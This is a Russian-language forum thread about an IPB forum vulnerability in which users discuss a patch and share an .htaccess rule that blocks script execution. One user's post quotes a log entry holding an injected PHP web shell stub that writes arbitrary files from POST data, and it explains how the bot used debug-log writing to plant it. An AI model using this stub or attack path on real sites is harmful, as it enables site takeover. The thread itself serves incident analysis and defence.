Интересный патч, в октябрьском патче функция safeUnserialize использовалась в самом core.php
Сейчас же её изменили на parseCleanValue в методе get класса IPSCookie
# Dirty sec patch <Files ~ "\.(php|cgi|pl|php3|php4|php5|php6|phtml|shtml)$"> Order allow,deny Deny from all </Files> <Files ~ "index.php"> Allow from all </Files> # Dirty sec patch
Такой хоть немного, но придает спокойствие - зальют, но не смогут использовать.
Обновляю, хот мне придется править все ручками - ядро изменялось.
Спасибо.
Подумываю теперь продлить лицензию.
Хотя от кривого когда никто не спасет. Но измененный .htaccess - хотя бы придает немного спокойствия.
И не появится.
Т.к. нужен ( в Вашем случае ) HTTP заголовок ( A59DC2C8 ) от клиента который бы содержал base64 закодированный сценарий для атаки.
--
Меня эта **ень тоже поразила, сайт на IPB.
Сейчас пытаюсь повторить все что бот делал.
В общем, первые действия, это они как то инициируют создание файла типа:
============================================================================== URL: /index.php/index.php Date: Mon, 05 Nov 2012 20:28:56 +0000 IP Address: 74.208.213.252 Time Taken: 0.00023 <?php print(md5(123456));echo file_put_contents($_POST[f],$_POST); ?> ============================================================================== ============================================================================== ========================= END =================================== ========================= /index.php? =================================== ==============================================================================
Дальше уже через него создают другой, более большой файл ( 92 КБ ) в котором текст читаем но на первый взгляд не понятен.
Выполняет какой то поиск(?).---------- Добавлено 07.11.2012 в 23:14 ----------Немного поискав, нашел конечный код который дает создать файл который я представил в теге code
Это функция writeDebugLog класса БД, которая вызывается с нестандартными параметрами.